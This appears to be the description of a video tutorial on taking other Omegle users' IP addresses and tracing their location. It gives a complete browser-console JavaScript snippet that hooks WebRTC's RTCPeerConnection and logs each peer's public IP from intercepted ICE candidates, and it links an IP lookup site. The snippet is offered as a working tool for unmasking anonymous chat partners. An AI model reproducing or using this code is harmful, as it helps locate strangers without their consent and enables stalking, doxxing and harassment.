How to get iP Addresses off Omegle and trace their location!
Hey everybody today I’m going to be showing you all how to get iP Addresses off Omegle.com then trace their location. Please drop a like and subscribe thank you.
Omegle – Omegle.com
IP Tracer: https://whatismyipaddress.com/ip-lookup
Code for the console: window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection
window.RTCPeerConnection = function(…args) {
const pc = new window.oRTCPeerConnection(…args)
pc.oaddIceCandidate = pc.addIceCandidate
pc.addIceCandidate = function(iceCandidate, …rest) {
const fields = iceCandidate.candidate.split(‘ ‘)
if (fields[7] === ‘srflx’) {
console.log(‘IP Address:’, fields[4])
}
return pc.oaddIceCandidate(iceCandidate, …rest)
}
return pc
}
ip address